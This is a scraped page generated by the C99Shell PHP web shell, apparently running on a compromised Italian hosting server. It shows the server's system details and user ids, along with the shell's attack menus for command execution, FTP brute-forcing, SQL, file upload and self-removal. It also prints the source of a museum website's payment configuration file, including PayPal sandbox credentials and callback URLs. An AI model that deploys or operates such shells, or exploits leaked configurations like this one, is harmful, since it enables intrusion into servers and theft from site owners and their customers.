!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/pagamento/   drwxr-xr-x
Free 184.32 GB of 490.84 GB (37.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     global.php (2.08 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

session_start
();

define('SITETITLE','Museo Mille Miglia');

define('SITENAME','<small>Viale della Bornata, 123 - 25135 S. Eufemia, Brescia - Italia</small><br>Museo Mille Miglia');

/** FAKE USER PAYMENT PAYPAL **/
// usr : sandbox_buy@test.it
// pass : 12345678

$paypal_url 'https://www.sandbox.paypal.com/cgi-bin/webscr'// https://www.paypal.com/cgi-bin/webscr https://www.sandbox.paypal.com/cgi-bin/webscr

$paypal_email 'pp_sandbox@essebinet.com';
$paypal_urlreturn_OK 'http://www.museomillemiglia.it/pagamento/paypal_esito.php?ok=1';
$paypal_urlreturn_KO 'http://www.museomillemiglia.it/pagamento/paypal_esito.php?ok=0';

$unicredit_notifyURL 'http://www.museomillemiglia.it/pagamento/unicredit_esito.php';
$unicredit_errorURL 'http://www.museomillemiglia.it/pagamento/error.php';


$email_from 'essebinet.monitoring@gmail.com';

$email_subject 'Museo Mille Miglia - Conferma richiesta di pagamento';
$email_pre '<h2>Museo Mille Miglia - Conferma richiesta di pagamento</h2><hr>';
$email_post '<b>Museo Mille Miglia</b><br>
Viale della Bornata, 123 25135 S. Eufemia Brescia - Italia<br><br>

Telefono: +39 030 3365631 - Fax: +39 030 3366411<br>
E-mail: segreteria@museomillemiglia.it<br><br>
P.Iva 03387090172</br>'
;


//** FUNZIONI **//


function outputField($name,$fieldName,$value,$placeholder 'placeholder',$validation 'required length') {
    
    
filter_var($value,FILTER_SANITIZE_STRING);
    
    echo 
'<div class="form-group">'.PHP_EOL;

    echo 
'    <label class="col-sm-3 control-label" for="'.$fieldName.'">'.$name.'';

    if(
strpos($validation,"required") > -) echo " (*)";

    echo 
'</label>'.PHP_EOL;

    echo 
'    <div class="col-sm-9">'.PHP_EOL;

    echo 
'        <input class="form-control" name="'.$fieldName.'" placeholder="'.$placeholder.'" type="text" data-validation="'.$validation.'"
                                                      data-validation-length="min1"
                                                      data-validation-error-msg="Questo campo รจ obbligatorio"
                                                      value="'
.$value.'"
                                                      '
;
                                                      
    if (!empty(
$value)) echo 'disabled data-collect=1 ';
    echo 
'         >'.PHP_EOL;

    echo 
'    </div>'.PHP_EOL;

    echo 
'</div>'.PHP_EOL;
}



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0076 ]--